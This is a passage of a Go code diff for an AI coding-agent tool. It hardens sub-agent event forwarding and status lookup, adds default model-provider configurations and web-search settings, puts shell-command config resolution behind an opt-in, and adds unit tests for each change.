+			log.Printf("[agent] sendParentEvent recovered from panic: %v (event type=%d)", r, ev.Type)
+			ok = false
+		}
+	}()
+	select {
+	case ch <- ev:
+		return true
+	case <-ctx.Done():
+		return false
+	}
+}
+
 // SubAgentStatusTool queries sub-agent status and results.
 type SubAgentStatusTool struct {
 	manager *AgentManager
@@ -188,9 +229,11 @@ func NewSubAgentStatusTool(m *AgentManager) *SubAgentStatusTool {
 	return &SubAgentStatusTool{manager: m}
 }
 
-func (t *SubAgentStatusTool) Name() string         { return "subagent_status" }
-func (t *SubAgentStatusTool) Description() string   { return "Query the status and results of a sub-agent." }
-func (t *SubAgentStatusTool) PromptSnippet() string { return "Check sub-agent status and get results" }
+func (t *SubAgentStatusTool) Name() string { return "subagent_status" }
+func (t *SubAgentStatusTool) Description() string {
+	return "Query the status and results of a sub-agent."
+}
+func (t *SubAgentStatusTool) PromptSnippet() string      { return "Check sub-agent status and get results" }
 func (t *SubAgentStatusTool) PromptGuidelines() []string { return nil }
 
 func (t *SubAgentStatusTool) Parameters() json.RawMessage {
@@ -209,26 +252,30 @@ func (t *SubAgentStatusTool) Execute(ctx context.Context, params map[string]any)
 		return tools.ToolResult{}, fmt.Errorf("handle is required")
 	}
 
-	a, ok := t.manager.Get(agentpkg.AgentID(handle))
-	if !ok {
+	st, statusOK := t.manager.Status(agentpkg.AgentID(handle))
+	a, agentOK := t.manager.Get(agentpkg.AgentID(handle))
+	if !statusOK && !agentOK {
 		return tools.ToolResult{}, fmt.Errorf("sub-agent %q not found", handle)
 	}
 
-	messages := a.GetMessages()
-	st, _ := t.manager.Status(agentpkg.AgentID(handle))
 	status := st.State
 	if status == "" {
 		status = "unknown"
 	}
 	lastResponse := st.Result
-	if lastResponse == "" {
+	messageCount := 0
+	if agentOK {
+		messages := a.GetMessages()
+		messageCount = len(messages)
+	}
+	if lastResponse == "" && agentOK {
 		lastResponse = lastAssistantResponse(a)
 	}
 
 	result := map[string]any{
 		"handle":        handle,
 		"status":        status,
-		"message_count": len(messages),
+		"message_count": messageCount,
 	}
 	if lastResponse != "" {
 		result["last_response"] = lastResponse
@@ -253,9 +300,13 @@ func NewSubAgentSendTool(m *AgentManager) *SubAgentSendTool {
 	return &SubAgentSendTool{manager: m}
 }
 
-func (t *SubAgentSendTool) Name() string         { return "subagent_send" }
-func (t *SubAgentSendTool) Description() string   { return "Send a follow-up message to a running sub-agent." }
-func (t *SubAgentSendTool) PromptSnippet() string { return "Send follow-up instructions to a sub-agent" }
+func (t *SubAgentSendTool) Name() string { return "subagent_send" }
+func (t *SubAgentSendTool) Description() string {
+	return "Send a follow-up message to a running sub-agent."
+}
+func (t *SubAgentSendTool) PromptSnippet() string {
+	return "Send follow-up instructions to a sub-agent"
+}
 func (t *SubAgentSendTool) PromptGuidelines() []string { return nil }
 
 func (t *SubAgentSendTool) Parameters() json.RawMessage {
@@ -283,25 +334,33 @@ func (t *SubAgentSendTool) Execute(ctx context.Context, params map[string]any) (
 
 	// Apply per-agent timeout for follow-up messages too
 	policy := DefaultSubAgentPolicy()
-	runCtx, cancel := context.WithTimeout(context.Background(), policy.TimeoutPerAgent)
+	parentRunCtx, ok := ParentRunContextFromContext(ctx)
+	if !ok || parentRunCtx == nil {
+		parentRunCtx = context.Background()
+	}
+	runCtx, cancel := context.WithTimeout(parentRunCtx, policy.TimeoutPerAgent)
 	t.manager.MarkRunning(a.ID())
+	t.manager.SetCancel(a.ID(), cancel)
 
 	// Extract parent's event channel for approval forwarding
 	parentEventCh, _ := EventChanFromContext(ctx)
 
 	go func() {
-		defer cancel()
+		defer func() {
+			cancel()
+			t.manager.SetCancel(a.ID(), nil)
+		}()
 		ch := a.Run(runCtx, message)
 		for e := range ch {
 			// Forward approval events to parent
 			if e.Type == agentpkg.EventToolApprovalRequest && parentEventCh != nil {
-				parentEventCh <- Event{
+				_ = sendParentEvent(runCtx, parentEventCh, Event{
 					Type:         EventToolApprovalRequest,
 					AgentID:      a.ID(),
 					ApprovalID:   e.ApprovalID,
 					ApprovalTool: e.ApprovalTool,
 					ApprovalArgs: e.ApprovalArgs,
-				}
+				})
 			}
 			switch e.Type {
 			case agentpkg.EventDone:
@@ -311,7 +370,9 @@ func (t *SubAgentSendTool) Execute(ctx context.Context, params map[string]any) (
 			}
 		}
 		if runCtx.Err() != nil {
-			t.manager.MarkError(a.ID(), runCtx.Err())
+			if st, ok := t.manager.Status(a.ID()); !ok || st.State != "done" {
+				t.manager.MarkError(a.ID(), runCtx.Err())
+			}
 		}
 	}()
 
@@ -359,9 +420,11 @@ func NewSubAgentDestroyTool(m *AgentManager) *SubAgentDestroyTool {
 	return &SubAgentDestroyTool{manager: m}
 }
 
-func (t *SubAgentDestroyTool) Name() string         { return "subagent_destroy" }
-func (t *SubAgentDestroyTool) Description() string   { return "Destroy a sub-agent and release resources." }
-func (t *SubAgentDestroyTool) PromptSnippet() string { return "Destroy a finished sub-agent" }
+func (t *SubAgentDestroyTool) Name() string { return "subagent_destroy" }
+func (t *SubAgentDestroyTool) Description() string {
+	return "Destroy a sub-agent and release resources."
+}
+func (t *SubAgentDestroyTool) PromptSnippet() string      { return "Destroy a finished sub-agent" }
 func (t *SubAgentDestroyTool) PromptGuidelines() []string { return nil }
 
 func (t *SubAgentDestroyTool) Parameters() json.RawMessage {
diff --git a/internal/agent/subagent_test.go b/internal/agent/subagent_test.go
index ed93c4c..b5ff783 100644
--- a/internal/agent/subagent_test.go
+++ b/internal/agent/subagent_test.go
@@ -127,6 +127,33 @@ func TestSubAgentStatusToolNotFound(t *testing.T) {
 	}
 }
 
+func TestSubAgentStatusToolAfterParentFinish(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	mgr.Create(AgentOptions{ID: "main"})
+	mgr.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	mgr.MarkDone("sub-1", "finished work")
+	mgr.Finish("main", nil)
+
+	tool := NewSubAgentStatusTool(mgr)
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"handle": "sub-1",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	var parsed map[string]any
+	if err := json.Unmarshal([]byte(result.Text), &parsed); err != nil {
+		t.Fatalf("failed to parse result: %v", err)
+	}
+	if parsed["status"] != "done" {
+		t.Fatalf("expected done status, got %q", parsed["status"])
+	}
+	if parsed["last_response"] != "finished work" {
+		t.Fatalf("expected retained response, got %q", parsed["last_response"])
+	}
+}
+
 func TestSubAgentStatusToolMissingHandle(t *testing.T) {
 	_, mgr := newTestFactoryAndManager(t)
 	tool := NewSubAgentStatusTool(mgr)
@@ -377,3 +404,44 @@ func TestSubAgentToolsDescriptions(t *testing.T) {
 		}
 	}
 }
+
+// TestSendParentEvent_ClosedChannel verifies sendParentEvent does not panic
+// when the channel is closed (recover logs and returns false).
+func TestSendParentEvent_ClosedChannel(t *testing.T) {
+	ch := make(chan Event, 1)
+	close(ch)
+
+	ev := Event{Type: EventStatus, StatusMessage: "test"}
+	ok := sendParentEvent(context.Background(), ch, ev)
+	if ok {
+		t.Error("expected sendParentEvent to return false on closed channel")
+	}
+}
+
+// TestSendParentEvent_ContextCanceled verifies sendParentEvent returns false
+// when the context is canceled and the channel is full (unbuffered, never read).
+func TestSendParentEvent_ContextCanceled(t *testing.T) {
+	ch := make(chan Event) // unbuffered — will block until context cancels
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel() // cancel immediately
+
+	ev := Event{Type: EventStatus, StatusMessage: "test"}
+	ok := sendParentEvent(ctx, ch, ev)
+	if ok {
+		t.Error("expected sendParentEvent to return false on canceled context")
+	}
+}
+
+// TestSendParentEvent_Success verifies sendParentEvent succeeds normally.
+func TestSendParentEvent_Success(t *testing.T) {
+	ch := make(chan Event, 1)
+	ev := Event{Type: EventStatus, StatusMessage: "test"}
+	ok := sendParentEvent(context.Background(), ch, ev)
+	if !ok {
+		t.Error("expected sendParentEvent to return true on success")
+	}
+	received := <-ch
+	if received.StatusMessage != "test" {
+		t.Errorf("expected 'test', got %q", received.StatusMessage)
+	}
+}
diff --git a/internal/config/settings.go b/internal/config/settings.go
index f5e730c..793d2b7 100644
--- a/internal/config/settings.go
+++ b/internal/config/settings.go
@@ -22,6 +22,7 @@ type Settings struct {
 	DefaultThinkingLevel string                     `json:"defaultThinkingLevel,omitempty"`
 	DefaultMode          string                     `json:"defaultMode,omitempty"`
 	EnablePlanTool       *bool                      `json:"enablePlanTool,omitempty"`
+	WebSearch            WebSearchSettings          `json:"webSearch"`
 	MaxContextTokens     int                        `json:"maxContextTokens,omitempty"`
 	MaxOutputTokens      int                        `json:"maxOutputTokens,omitempty"`
 	ContextFiles         ContextFilesSettings       `json:"contextFiles"`
@@ -37,13 +38,29 @@ type Settings struct {
 }
 
 type ProviderConfig struct {
-	Vendor         string        `json:"vendor,omitempty"` // Explicit vendor adapter (Decision 12/13)
-	APIKey         string        `json:"apiKey,omitempty"`
-	BaseURL        string        `json:"baseUrl,omitempty"`
-	API            string        `json:"api,omitempty"`
-	ThinkingFormat string        `json:"thinkingFormat,omitempty"` // "", "openai", "anthropic", "deepseek", "xiaomi"
-	CacheControl   *bool         `json:"cacheControl,omitempty"`   // enable Anthropic prompt caching (nil/false=off, true=on; set true for Claude models)
-	Models         []ModelConfig `json:"models"`
+	Vendor         string          `json:"vendor,omitempty"` // Explicit vendor adapter (Decision 12/13)
+	APIKey         string          `json:"apiKey,omitempty"`
+	BaseURL        string          `json:"baseUrl,omitempty"`
+	HTTPProxy      string          `json:"httpProxy,omitempty"` // optional per-provider HTTP proxy URL, e.g. http://127.0.0.1:7890
+	API            string          `json:"api,omitempty"`
+	ThinkingFormat string          `json:"thinkingFormat,omitempty"` // "", "openai", "anthropic", "deepseek", "xiaomi"
+	CacheControl   *bool           `json:"cacheControl,omitempty"`   // enable Anthropic prompt caching (nil/false=off, true=on; set true for Claude models)
+	Responses      ResponsesConfig `json:"responses,omitempty"`
+	Models         []ModelConfig   `json:"models"`
+}
+
+type ResponsesConfig struct {
+	ReasoningSummary     string `json:"reasoningSummary,omitempty"`     // "auto" (default), "concise", or "detailed"
+	PromptCacheEnabled   *bool  `json:"promptCacheEnabled,omitempty"`   // nil/true = on, false = off
+	PromptCacheKey       string `json:"promptCacheKey,omitempty"`       // optional explicit cache key; defaults to provider/model stable key
+	PromptCacheRetention string `json:"promptCacheRetention,omitempty"` // optional OpenAI prompt cache retention value
+}
+
+type WebSearchSettings struct {
+	Enabled      *bool  `json:"enabled,omitempty"`
+	Provider     string `json:"provider,omitempty"`
+	ProviderType string `json:"providerType,omitempty"`
+	Model        string `json:"model,omitempty"`
 }
 
 type ModelConfig struct {
@@ -52,6 +69,8 @@ type ModelConfig struct {
 	Reasoning     bool         `json:"reasoning,omitempty"`
 	ContextWindow int          `json:"contextWindow,omitempty"`
 	MaxTokens     int          `json:"maxTokens,omitempty"`
+	Temperature   *float64     `json:"temperature,omitempty"` // nil = use API default
+	TopP          *float64     `json:"top_p,omitempty"`       // nil = use API default
 	Cost          *CostConfig  `json:"cost,omitempty"`
 	Input         []string     `json:"input,omitempty"`
 	Compat        *ModelCompat `json:"compat,omitempty"` // Vendor compatibility flags (Decision 14)
@@ -83,6 +102,8 @@ type ModelCompat struct {
 	// Cache
 	SupportsCacheControlOnTools *bool `json:"supportsCacheControlOnTools,omitempty"`
 	SupportsLongCacheRetention  *bool `json:"supportsLongCacheRetention,omitempty"`
+	SupportsPromptCacheKey      *bool `json:"supportsPromptCacheKey,omitempty"`
+	SupportsReasoningSummary    *bool `json:"supportsReasoningSummary,omitempty"`
 	SendSessionAffinityHeaders  bool  `json:"sendSessionAffinityHeaders,omitempty"`
 
 	// Streaming
@@ -138,6 +159,17 @@ type ApprovalSettings struct {
 func DefaultSettings() *Settings {
 	return &Settings{
 		Providers: map[string]*ProviderConfig{
+			"anthropic": &ProviderConfig{
+				BaseURL: "https://api.anthropic.com",
+				APIKey:  "${ANTHROPIC_API_KEY}",
+				API:     "anthropic-messages",
+				Models: []ModelConfig{
+					{ID: "claude-sonnet-4-20250514", Name: "Claude 4 Sonnet", Reasoning: true, ContextWindow: 200000, MaxTokens: 16384, Cost: &CostConfig{Input: 3.0, Output: 15.0, CacheRead: 0.3, CacheWrite: 3.75}, Input: []string{"text", "image"}},
+					{ID: "claude-3-5-sonnet-20241022", Name: "Claude 3.5 Sonnet", ContextWindow: 200000, MaxTokens: 8192, Cost: &CostConfig{Input: 3.0, Output: 15.0, CacheRead: 0.3, CacheWrite: 3.75}, Input: []string{"text", "image"}},
+					{ID: "claude-3-5-haiku-20241022", Name: "Claude 3.5 Haiku", ContextWindow: 200000, MaxTokens: 8192, Cost: &CostConfig{Input: 0.8, Output: 4.0, CacheRead: 0.08, CacheWrite: 1.0}, Input: []string{"text", "image"}},
+					{ID: "claude-3-opus-20240229", Name: "Claude 3 Opus", ContextWindow: 200000, MaxTokens: 4096, Cost: &CostConfig{Input: 15.0, Output: 75.0, CacheRead: 1.5, CacheWrite: 18.75}, Input: []string{"text", "image"}},
+				},
+			},
 			"deepseek-anthropic": &ProviderConfig{
 				BaseURL: "https://api.deepseek.com/anthropic",
 				APIKey:  "${DEEPSEEK_API_KEY}",
@@ -156,12 +188,53 @@ func DefaultSettings() *Settings {
 					{ID: "deepseek-v4-pro", Name: "DeepSeek-V4-Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 384000, Cost: &CostConfig{Input: 1, Output: 4}, Input: []string{"text"}},
 				},
 			},
+			"openai": &ProviderConfig{
+				BaseURL: "https://api.openai.com/v1",
+				APIKey:  "${OPENAI_API_KEY}",
+				API:     "openai-responses",
+				Models: []ModelConfig{
+					{ID: "gpt-4o", Name: "GPT-4o", ContextWindow: 128000, MaxTokens: 16384, Cost: &CostConfig{Input: 2.5, Output: 10.0, CacheRead: 1.25, CacheWrite: 2.5}, Input: []string{"text", "image"}},
+					{ID: "gpt-4o-mini", Name: "GPT-4o Mini", ContextWindow: 128000, MaxTokens: 16384, Cost: &CostConfig{Input: 0.15, Output: 0.6, CacheRead: 0.075, CacheWrite: 0.15}, Input: []string{"text", "image"}},
+					{ID: "o1", Name: "o1", Reasoning: true, ContextWindow: 200000, MaxTokens: 100000, Cost: &CostConfig{Input: 15.0, Output: 60.0, CacheRead: 7.5, CacheWrite: 15.0}, Input: []string{"text", "image"}},
+					{ID: "o3-mini", Name: "o3-mini", Reasoning: true, ContextWindow: 200000, MaxTokens: 100000, Cost: &CostConfig{Input: 1.1, Output: 4.4, CacheRead: 0.55, CacheWrite: 1.1}, Input: []string{"text", "image"}},
+				},
+			},
+			"google-gemini": &ProviderConfig{
+				BaseURL: "https://generativelanguage.googleapis.com/v1beta/models",
+				APIKey:  "${GOOGLE_API_KEY}",
+				API:     "google-gemini",
+				Models: []ModelConfig{
+					{ID: "gemini-2.5-pro", Name: "Gemini 2.5 Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+					{ID: "gemini-2.5-flash", Name: "Gemini 2.5 Flash", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+				},
+			},
+			"google-vertex": &ProviderConfig{
+				BaseURL: "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models",
+				APIKey:  "${GOOGLE_VERTEX_ACCESS_TOKEN}",
+				API:     "google-vertex",
+				Models: []ModelConfig{
+					{ID: "gemini-2.5-pro", Name: "Gemini 2.5 Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+					{ID: "gemini-2.5-flash", Name: "Gemini 2.5 Flash", Reasoning: true, ContextWindow: 1000000, MaxTokens: 65536, Input: []string{"text", "image"}},
+				},
+			},
+			"xiaomi": &ProviderConfig{
+				BaseURL:        "https://api.xiaomimimo.com/v1",
+				APIKey:         "${XIAOMI_API_KEY}",
+				API:            "openai-chat",
+				ThinkingFormat: "xiaomi",
+				Models: []ModelConfig{
+					{ID: "mimo-v2.5-pro", Name: "MiMo-V2.5-Pro", Reasoning: true, ContextWindow: 1000000, MaxTokens: 128000, Cost: &CostConfig{Input: 0.435, Output: 0.87, CacheRead: 0.0036}, Input: []string{"text"}},
+					{ID: "mimo-v2.5", Name: "MiMo-V2.5", Reasoning: true, ContextWindow: 1000000, MaxTokens: 128000, Cost: &CostConfig{Input: 0.14, Output: 0.28, CacheRead: 0.0028}, Input: []string{"text", "image", "audio", "video"}},
+					{ID: "mimo-v2-flash", Name: "MiMo-V2-Flash", Reasoning: true, ContextWindow: 256000, MaxTokens: 64000, Cost: &CostConfig{Input: 0.10, Output: 0.30, CacheRead: 0.01}, Input: []string{"text"}},
+				},
+			},
 		},
 		DefaultProvider:      "deepseek-openai",
 		DefaultModel:         "deepseek-v4-flash",
 		DefaultThinkingLevel: "medium",
 		DefaultMode:          "agent",
 		EnablePlanTool:       boolPtr(true),
+		WebSearch:            WebSearchSettings{Enabled: boolPtr(false), Provider: "openai", ProviderType: "responses"},
 		ContextFiles:         ContextFilesSettings{Enabled: true},
 		SkillsDir:            platform.SkillsDir(),
 		Compaction:           CompactionSettings{Enabled: true, ReserveTokens: 16384, KeepRecentTokens: 20000},
@@ -281,6 +354,9 @@ func mergeSettings(s, proj *Settings) {
 	if proj.EnablePlanTool != nil {
 		s.EnablePlanTool = boolPtr(*proj.EnablePlanTool)
 	}
+	if proj.WebSearch.Enabled != nil || proj.WebSearch.Provider != "" || proj.WebSearch.ProviderType != "" {
+		s.WebSearch = mergeWebSearchSettings(s.WebSearch, proj.WebSearch)
+	}
 	if proj.MaxContextTokens != 0 {
 		s.MaxContextTokens = proj.MaxContextTokens
 	}
@@ -378,6 +454,9 @@ func providerToEnvVar(name string) string {
 
 func resolveKeyValue(key string) string {
 	if strings.HasPrefix(key, "!") {
+		if os.Getenv("VIBECODING_ALLOW_SHELL_CONFIG") != "1" {
+			return key
+		}
 		return resolveShellCommand(key[1:])
 	}
 
@@ -464,6 +543,50 @@ func (s *Settings) IsPlanToolEnabled() bool {
 	return *s.EnablePlanTool
 }
 
+func (s *Settings) IsWebSearchEnabled() bool {
+	if s == nil || s.WebSearch.Enabled == nil {
+		return false
+	}
+	return *s.WebSearch.Enabled
+}
+
+func mergeWebSearchSettings(base, override WebSearchSettings) WebSearchSettings {
+	if override.Enabled != nil {
+		base.Enabled = boolPtr(*override.Enabled)
+	}
+	if override.Provider != "" {
+		base.Provider = override.Provider
+		if override.ProviderType == "" {
+			base.ProviderType = ""
+		}
+	}
+	if override.ProviderType != "" {
+		base.ProviderType = override.ProviderType
+	}
+	if override.Model != "" {
+		base.Model = override.Model
+	}
+	return normalizeWebSearchSettings(base)
+}
+
+func normalizeWebSearchSettings(cfg WebSearchSettings) WebSearchSettings {
+	if cfg.Enabled == nil {
+		cfg.Enabled = boolPtr(false)
+	}
+	if cfg.Provider == "" {
+		cfg.Provider = "openai"
+	}
+	if cfg.ProviderType == "" {
+		switch cfg.Provider {
+		case "anthropic":
+			cfg.ProviderType = "messages"
+		default:
+			cfg.ProviderType = "responses"
+		}
+	}
+	return cfg
+}
+
 func SaveGlobalSettings(s *Settings) error {
 	dir := ConfigDir()
 	if err := os.MkdirAll(dir, 0700); err != nil {
diff --git a/internal/config/settings_test.go b/internal/config/settings_test.go
index ec1c3d6..ef0872e 100644
--- a/internal/config/settings_test.go
+++ b/internal/config/settings_test.go
@@ -22,13 +22,38 @@ func TestDefaultSettings(t *testing.T) {
 		t.Errorf("expected default mode 'agent', got '%s'", s.DefaultMode)
 	}
 
-	if len(s.Providers) != 2 {
-		t.Errorf("expected 2 providers, got %d", len(s.Providers))
+	if len(s.Providers) != 7 {
+		t.Errorf("expected 7 providers, got %d", len(s.Providers))
+	}
+
+	if s.Providers["openai"] == nil {
+		t.Fatal("expected default openai provider")
+	}
+	if s.Providers["anthropic"] == nil {
+		t.Fatal("expected default anthropic provider")
+	}
+	if s.Providers["xiaomi"] == nil {
+		t.Fatal("expected default xiaomi provider")
+	}
+	if s.Providers["google-gemini"] == nil {
+		t.Fatal("expected default google-gemini provider")
+	}
+	if s.Providers["google-vertex"] == nil {
+		t.Fatal("expected default google-vertex provider")
 	}
 
 	if s.DefaultThinkingLevel != "medium" {
 		t.Errorf("expected thinking level 'medium', got '%s'", s.DefaultThinkingLevel)
 	}
+	if s.WebSearch.Enabled == nil || *s.WebSearch.Enabled {
+		t.Fatalf("expected web search to be disabled by default, got %#v", s.WebSearch.Enabled)
+	}
+	if s.WebSearch.Provider != "openai" || s.WebSearch.ProviderType != "responses" {
+		t.Fatalf("unexpected web search defaults: %#v", s.WebSearch)
+	}
+	if s.WebSearch.Model != "" {
+		t.Fatalf("expected empty web search model by default, got %q", s.WebSearch.Model)
+	}
 }
 
 func TestGetProviderConfig(t *testing.T) {
@@ -155,6 +180,9 @@ func TestLoadSettings(t *testing.T) {
 	if s.DefaultProvider != "test" {
 		t.Errorf("expected provider 'test', got '%s'", s.DefaultProvider)
 	}
+	if s.WebSearch.Model != "" {
+		t.Errorf("expected empty webSearch.model, got '%s'", s.WebSearch.Model)
+	}
 }
 
 func TestLoadSettingsAppliesProjectOverridesAndEnv(t *testing.T) {
@@ -448,6 +476,18 @@ func TestResolveKeyValue(t *testing.T) {
 	os.Unsetenv("TEST_ENV_KEY")
 }
 
+func TestResolveKeyValueShellCommandRequiresOptIn(t *testing.T) {
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "")
+	if got := resolveKeyValue("!printf secret"); got != "!printf secret" {
+		t.Fatalf("resolveKeyValue without opt-in = %q, want literal", got)
+	}
+
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "1")
+	if got := resolveKeyValue("!printf secret"); got != "secret" {
+		t.Fatalf("resolveKeyValue with opt-in = %q, want secret", got)
+	}
+}
+
 func contains(s, substr string) bool {
 	return len(s) >= len(substr) && (s == substr || len(s) > 0 && containsSubstring(s, substr))
 }
diff --git a/internal/context/compaction.go b/internal/context/compaction.go
index dd0e454..425e826 100644
--- a/internal/context/compaction.go
+++ b/internal/context/compaction.go
@@ -6,6 +6,7 @@ import (
 	"strings"
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/util"
 )
 
 func abs(x int) int {
@@ -141,11 +142,7 @@ func SerializeConversation(messages []provider.Message) string {
 		case "user":
 			content := msg.Content
 			if content == "" {
-				for _, block := range msg.Contents {
-					if block.Type == "text" {
-						content += block.Text
-					}
-				}
+				content = serializeContentBlocks(msg.Contents)
 			}
 			sb.WriteString(fmt.Sprintf("User: %s\n\n", content))
 
@@ -153,11 +150,7 @@ func SerializeConversation(messages []provider.Message) string {
 			sb.WriteString("Assistant: ")
 			content := msg.Content
 			if content == "" {
-				for _, block := range msg.Contents {
-					if block.Type == "text" {
-						content += block.Text
-					}
-				}
+				content = serializeTextBlocks(msg.Contents)
 			}
 			sb.WriteString(content)
 			for _, block := range msg.Contents {
@@ -173,18 +166,54 @@ func SerializeConversation(messages []provider.Message) string {
 			sb.WriteString("\n\n")
 
 		case "toolResult":
-			sb.WriteString(fmt.Sprintf("Tool Result [%s]: %s\n\n", msg.ToolName, truncateString(msg.Content, 500)))
+			content := msg.Content
+			if content == "" {
+				content = serializeContentBlocks(msg.Contents)
+			}
+			sb.WriteString(fmt.Sprintf("Tool Result [%s]: %s\n\n", msg.ToolName, truncateString(content, 500)))
 		}
 	}
 
 	return sb.String()
 }
 
-func truncateString(s string, maxLen int) string {
-	if len(s) <= maxLen {
-		return s
+func serializeTextBlocks(blocks []provider.ContentBlock) string {
+	var sb strings.Builder
+	for _, block := range blocks {
+		if block.Type == "text" {
+			sb.WriteString(block.Text)
+		}
 	}
-	return s[:maxLen] + "..."
+	return sb.String()
+}
+
+func serializeContentBlocks(blocks []provider.ContentBlock) string {
+	var parts []string
+	for _, block := range blocks {
+		switch block.Type {
+		case "text":
+			if block.Text != "" {
+				parts = append(parts, block.Text)
+			}
+		case "image":
+			if block.Image != nil {
+				parts = append(parts, fmt.Sprintf("[image: %s]", block.Image.MimeType))
+			} else {
+				parts = append(parts, "[image]")
+			}
+		case "thinking":
+			parts = append(parts, fmt.Sprintf("[thinking: %s]", block.Thinking))
+		case "toolCall":
+			if block.ToolCall != nil {
+				parts = append(parts, fmt.Sprintf("[tool_call: %s(%s)]", block.ToolCall.Name, string(block.ToolCall.Arguments)))
+			}
+		}
+	}
+	return strings.Join(parts, "\n")
+}
+
+func truncateString(s string, maxLen int) string {
+	return util.TruncateWithSuffix(s, maxLen, "...")
 }
 
 // compressionInstruction is the instruction injected into the conversation for Insert-then-Compress.
diff --git a/internal/context/context_test.go b/internal/context/context_test.go
index 3178b90..ffc1756 100644
--- a/internal/context/context_test.go
+++ b/internal/context/context_test.go
@@ -1,6 +1,7 @@
 package context
 
 import (
+	"strings"
 	"testing"
 
 	"github.com/startvibecoding/vibecoding/internal/provider"
@@ -194,6 +195,239 @@ func TestFindCutPoint(t *testing.T) {
 	}
 }
 
+func TestEstimateTokensImage(t *testing.T) {
+	msg := provider.Message{
+		Role: "user",
+		Contents: []provider.ContentBlock{
+			{Type: "image", Image: &provider.ImageContent{MimeType: "image/png", Data: "base64data"}},
+		},
+	}
+	result := EstimateTokens(msg)
+	if result != 1200 { // 4800 chars / 4 = 1200
+		t.Errorf("EstimateTokens(image) = %d, want 1200", result)
+	}
+}
+
+func TestEstimateTokensThinking(t *testing.T) {
+	msg := provider.Message{
+		Role: "assistant",
+		Contents: []provider.ContentBlock{
+			{Type: "thinking", Thinking: "Let me think about this..."},
+		},
+	}
+	result := EstimateTokens(msg)
+	expected := (len("Let me think about this...") + 3) / 4
+	if result != expected {
+		t.Errorf("EstimateTokens(thinking) = %d, want %d", result, expected)
+	}
+}
+
+func TestEstimateTokensContentBlocksTakePrecedence(t *testing.T) {
+	// When Contents is non-empty, Content should be ignored
+	msg := provider.Message{
+		Role:    "assistant",
+		Content: "This should be ignored because Contents is set",
+		Contents: []provider.ContentBlock{
+			{Type: "text", Text: "Short"},
+		},
+	}
+	result := EstimateTokens(msg)
+	expected := (len("Short") + 3) / 4
+	if result != expected {
+		t.Errorf("EstimateTokens() = %d, want %d (should use Contents, not Content)", result, expected)
+	}
+}
+
+func TestEstimateTokensToolCallNilBlock(t *testing.T) {
+	msg := provider.Message{
+		Role: "assistant",
+		Contents: []provider.ContentBlock{
+			{Type: "toolCall", ToolCall: nil},
+		},
+	}
+	result := EstimateTokens(msg)
+	if result != 0 { // 0 chars -> (0+3)/4 = 0
+		t.Errorf("EstimateTokens(nil toolCall) = %d, want 0", result)
+	}
+}
+
+func TestCalculateContextTokensFallback(t *testing.T) {
+	// When TotalTokens is 0, should sum components
+	usage := &provider.Usage{
+		Input:       100,
+		Output:      50,
+		CacheRead:   20,
+		CacheWrite:  10,
+		TotalTokens: 0,
+	}
+	result := CalculateContextTokens(usage)
+	if result != 180 {
+		t.Errorf("CalculateContextTokens() = %d, want 180", result)
+	}
+}
+
+func TestEstimateContextTokensNoUsage(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello"},
+		{Role: "assistant", Content: "Hi there"},
+	}
+
+	tokens, lastUsageIndex := EstimateContextTokens(messages)
+	if lastUsageIndex != -1 {
+		t.Errorf("lastUsageIndex = %d, want -1", lastUsageIndex)
+	}
+	// Should estimate all messages
+	expected := EstimateTokens(messages[0]) + EstimateTokens(messages[1])
+	if tokens != expected {
+		t.Errorf("tokens = %d, want %d", tokens, expected)
+	}
+}
+
+func TestEstimateContextTokensEmptyMessages(t *testing.T) {
+	tokens, lastUsageIndex := EstimateContextTokens(nil)
+	if tokens != 0 {
+		t.Errorf("tokens = %d, want 0", tokens)
+	}
+	if lastUsageIndex != -1 {
+		t.Errorf("lastUsageIndex = %d, want -1", lastUsageIndex)
+	}
+}
+
+func TestEstimateContextTokensUsageWithZeroTotal(t *testing.T) {
+	// Usage present but TotalTokens=0 → should skip and estimate manually
+	messages := []provider.Message{
+		{Role: "user", Content: "Hello"},
+		{Role: "assistant", Content: "Hi", Usage: &provider.Usage{TotalTokens: 0}},
+	}
+	_, lastUsageIndex := EstimateContextTokens(messages)
+	// Usage TotalTokens=0 means we skip it
+	if lastUsageIndex != -1 {
+		t.Errorf("lastUsageIndex = %d, want -1 (zero TotalTokens should be skipped)", lastUsageIndex)
+	}
+}
+
+func TestFindValidCutPoints(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user", Content: "msg1"},
+		{Role: "assistant", Content: "resp1"},
+		{Role: "toolResult", Content: "result1"},
+		{Role: "user", Content: "msg2"},
+		{Role: "assistant", Content: "resp2"},
+	}
+
+	cuts := FindValidCutPoints(messages, 0, len(messages))
+	// Should include indices 0,1,3,4 but NOT 2 (toolResult)
+	expected := []int{0, 1, 3, 4}
+	if len(cuts) != len(expected) {
+		t.Fatalf("FindValidCutPoints() = %v, want %v", cuts, expected)
+	}
+	for i, c := range cuts {
+		if c != expected[i] {
+			t.Errorf("cuts[%d] = %d, want %d", i, c, expected[i])
+		}
+	}
+}
+
+func TestFindValidCutPointsSubrange(t *testing.T) {
+	messages := []provider.Message{
+		{Role: "user"},
+		{Role: "assistant"},
+		{Role: "user"},
+		{Role: "assistant"},
+	}
+
+	cuts := FindValidCutPoints(messages, 1, 3)
+	expected := []int{1, 2}
+	if len(cuts) != len(expected) {
+		t.Fatalf("FindValidCutPoints(1,3) = %v, want %v", cuts, expected)
+	}
+}
+
+func TestFindValidCutPointsEmpty(t *testing.T) {
+	cuts := FindValidCutPoints(nil, 0, 0)
+	if len(cuts) != 0 {
+		t.Errorf("FindValidCutPoints(nil) = %v, want empty", cuts)
+	}
+}
+
